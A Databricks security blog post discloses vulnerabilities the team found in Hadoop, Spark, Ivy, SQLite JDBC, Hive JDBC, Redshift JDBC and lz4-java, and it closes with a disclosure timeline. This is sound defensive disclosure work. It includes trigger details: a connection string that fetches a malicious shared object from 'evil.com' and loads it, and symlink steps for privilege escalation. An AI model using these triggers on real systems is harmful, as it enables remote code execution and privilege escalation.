Open Source Security at Databricks

Published: October 24, 2024

by Neil Archibald, Kostya Kortchinsky and Hamza Tahmi

The Databricks Product Security team is deeply committed to ensuring the security and integrity of its products, which are built on top of and integrated with a variety of open source projects. Recognizing the importance of these open source foundations, the team actively contributes to the security of these projects, thereby enhancing the overall security posture of both Databricks products and the broader open source ecosystem. This commitment is manifested through several key activities, including identifying and reporting vulnerabilities, contributing patches, and participating in security reviews and audits of open source projects. By doing so, Databricks not only safeguards its own products but also supports the resilience and security of the open source projects it relies on.

This blog will provide an overview of the technical details of some of the vulnerabilities that the team discovered.

CVE-2022-26612: Hadoop FileUtil unTarUsingTar shell command injection vulnerability

Apache Hadoop Common offers an API that allows users to untar an archive using the tar Unix tool. To do so, it builds a command line, potentially also using gzip, and executes it. The issue lies in the fact that the path to the archive, which could be under user control, is not properly escaped in some situations. This could allow a malicious user to inject their own commands in the archive name, via shell metacharacters for example.

The vulnerable code can be found here.

Note that makeSecureShellPath only escapes single quotes but doesn’t add any. There were some debates as to the consequences of the issue for Hadoop itself, but in the end since it is a publicly offered API, it ended up warranting a fix. Databricks was invested in fixing this issue as the Spark code for unpack was leveraging the vulnerable code.

CVE-2022-33891: Apache Spark™ UI shell command injection vulnerability

Apache Spark™ uses some API to map a given user name to a set of groups it belongs to. One of the implementations is ShellBasedGroupsMappingProvider, which leveraged the id Unix command. The username passed to the function was appended to the command without being properly escaped, potentially allowing for arbitrary command injection.

The vulnerable code could be found here.

We had to figure out if this provider could be reached with untrusted user input, and found the following path:

ShellBasedGroupsMappingProvider.getGroups
Utils.getCurrentUserGroups
SecurityManager.isUserInACL
SecurityManager.checkUIViewPermissions
HttpSecurityFilter.doFilter

Ironically, the Spark UI HTTP security filter could allow that code to reached via the doAs query parameter (see here). Fortunately, some checks in isUserInACL prevented this vulnerability to be triggerable in a default configuration.

CVE-2022-37865: Apache Ivy “zip slip”

Apache Ivy supports a packaging attribute that allows artifacts to be unpacked on the fly. The function used to perform the Zip unpacking didn’t check for “../” in the Zip entry names, allowing for a directory traversal type of attack, also known as “zip slip”.

The vulnerable code could be found here.

This could allow a user with the ability to feed Ivy a malicious module descriptor to write files outside of the local download cache.

CVE-2023-32697: SQLite JDBC driver remote code execution

SQLite JDBC driver can be made to load a remote extension due to the predictable temporary file naming when loading a remote database file using jdbc:sqlite::resource and enable_load_extension options that enable extension loading.

The main issue is using hashCode method to generate a temporary name without taking into account that hashCode will produce the same output for the same string across JVMs, an attacker can predict the output and, therefore, the location of the download file.

The vulnerable code can be found here.

While the issue can be triggered in one step, here is a breakdown for simplicity:

Using the following connection string: “jdbc:sqlite::resource:http://evil.com/evil.so?enable_load_extension=true”

This will result in downloading the .so file in a predictable location in the /tmp folder, and can be later loaded using: “select load_extension('/tmp/sqlite-jdbc-tmp-{NUMBER}.db')”

CVE-2023-35701: Apache Hive JDBC driver arbitrary command execution

JDBC driver scrutiny has increased in the last few years, thanks to the work of people like pyn3rd, who presented their work at Security Conferences worldwide, notably “Make JDBC Attack Brilliant Again.” This issue is just a byproduct of their work, as it looks very similar to another issue they reported in the Snowflake JDBC driver.

The core of the issue resides in the openBrowserWindow function that can be found here.

This function will execute a command based on the redirect URI that could potentially be provided by an untrusted source.

To trigger the issue, one can specify a connection string such as: jdbc:hive2://URL/default;auth=browser;transportMode=http;httpPath=jdbc;ssl=true which uses the browser authentication mechanism, with an endpoint that will return a 302 and specify a Location header (as well as X-Hive-Client-Identifier) to provoke the faulty behavior. The fact that ssoURI is a Java URI restricts the freedom that an attacker would have with their crafted command line.

CVE-2024-23945: Apache Spark™ and Hive Thrift Server cookie verification bypass

Spark's ThriftHttpServlet can be made to accept a cookie that will serve as a way to authenticate a user. It is controlled by the hive.server2.thrift.http.cookie.auth.enabled configuration option (the default value for this option depends on the project, but some of them have it set to true). The validateCookie function will be used to verify it, which will ultimately call CookieSigner.verifyAndExtract. The issue resides in the fact that on verification failure, an exception will be raised that will return both the received signature and the expected valid one, allowing a user to send the request again with said valid signature.

The vulnerable code can be found here.

Example output returned to the client:

Both Apache Hive and Apache Spark™ were vulnerable to this and were fixed with the following PRs:

https://github.com/apache/spark/commit/cf59b1f51c16301f689b4e0f17ba4dbd140e1b19 on the Spark side
https://github.com/apache/hive/commit/7638cb1a3b07713cc490aa2909a37037f89e08b4 on the Hive side

The timeline for this issue to be fixed and published illustrates some of the difficulties encountered when dealing with reporting vulnerabilities to Open Source projects:

May 16, 2023: reported to [email protected]
May 17, 2023: acknowledged
Jun 9, 2023: requested update on the case
Jun 12, 2023: reply that this may be a security issue
Oct 16, 2023: requested an update on the case
Oct 17, 2023: reply that a patch can be applied to Spark, but the status on the Hive side is unclear
Nov 6, 2023: requested an update on the case
Dec 4, 2023: requested an update on the case after noticing that the issue is publicly fixed in Hive and Spark
Feb 7, 2024: requested an update on the case
Feb 23, 2024: release of Spark 3.5.1
Mar 5, 2024: requested an update on the case
Mar 20, 2024: reply that this has been assigned CVE-2024-23945 on the Spark side
Mar 29, 2024: release of Hive 4.0.0
Apr 19, 2024: announcing that we will publish details of the issue since it’s been more than a year, with little to no updates from the relevant Apache PMCs

Redshift JDBC Arbitrary File Append

The Amazon JDBC Driver for Redshift is a Type 4 JDBC driver that enables database connectivity using the standard JDBC APIs provided in the Java Platform, Enterprise Edition. This driver allows any Java application, application server, or Java-enabled applet to access Redshift.

If the JDBC driver is extended across a privilege boundary, an attacker can use the Redshift JDBC Driver's logging functionality to append partially controlled log contents to any file on the filesystem. The contents can contain newlines / arbitrary characters and can be used to elevate privileges.

In the connection URL, a "LogPath" variable can be used to supply the path in which log files should be stored.

This results in files such as "redshift_jdbc_connection_XX.log," where XX is a sequential number within the directory, and log entries are written to the file as expected. When creating these files, symbolic links are honored, and the log contents are written to the target of the link.

By using a controlled directory and symlinking to critical files, a user in our environment can gain a controlled write to arbitrary root-owned files and elevate privileges on the system.

The source code for the Redshift JDBC logfile handling is available at the following repo: https://github.com/aws/amazon-redshift-jdbc-driver/blame/33e046e1ccef43517fe4deb96f38cc5ac2bc73d1/src/main/java/com/amazon/redshift/logger/LogFileHandler.java#L225

To recreate this, you can create a directory in tmp, such as “/tmp/logging.” Within this directory, the user must create symbolic links with filenames matching the pattern redshift_jdbc_connection_XX.log, where the log file increments each time the redshift JDBC connector is used.

These symbolic links must point to the file you wish to append to. The attacker can then trigger the use of the Redshift JDBC connector, following the symlink and appending it to the file.

LZ4 Java arbitrary file write privilege escalation

The lz4-java library (a java wrapper around the lz4 library) contains a file-based race condition vulnerability that occurs when a compiled library is dropped onto a disk. Large Java applications such as Spark and Hadoop use this library heavily.

The following code demonstrates this vulnerability:

As you can see, this code writes out a .so stored within the jar file to a temporary directory before loading and executing it. The createTempFile function is used to generate a unique path to avoid collisions. Before writing the file to disk, the developer creates a variant version of the file with a .lck extension for the assumed purpose of stopping collisions from other processes using the library. However, this .lck file will allow an attacker watching the directory to attempt to race the creation of the file after receiving the filename from the .lck creation and creating a symbolic link pointing anywhere on the filesystem.

The ramifications of this are twofold: first, the attacker will be able to overwrite any file on the system with the contents of this .so file. This may allow an unprivileged attacker to overwrite root owned files. Second, the symlink can be replaced between writing and loading, allowing the attacker to load a custom shared object they provide as root. If this library is used across a privilege boundary, this may grant an attacker with code execution at an elevated privilege level.

Conclusion

At Databricks, we recognize that enhancing the security of the open source software we utilize is a collective effort. We are committed to proactively improving the security of our contributions and dependencies, fostering collaboration within the community, and implementing best practices to safeguard our systems. By prioritizing security and encouraging transparency, we aim to create a more resilient open source environment for everyone. Learn more about Databricks Security on our Security and Trust Center.

What's next?

November 20, 2024/4 min read

Introducing Predictive Optimization for Statistics

November 21, 2024/3 min read

CVE-2022-26612: Hadoop FileUtil unTarUsingTar shell command injection vulnerability

CVE-2022-33891: Apache Spark™ UI shell command injection vulnerability

CVE-2022-37865: Apache Ivy “zip slip”

CVE-2023-32697: SQLite JDBC driver remote code execution

CVE-2023-35701: Apache Hive JDBC driver arbitrary command execution

CVE-2024-23945: Apache Spark™ and Hive Thrift Server cookie verification bypass

Redshift JDBC Arbitrary File Append

LZ4 Java arbitrary file write privilege escalation

Conclusion

Never miss a Databricks post

Sign up

What's next?

Introducing Predictive Optimization for Statistics

How to present and share your Notebook insights in AI/BI Dashboards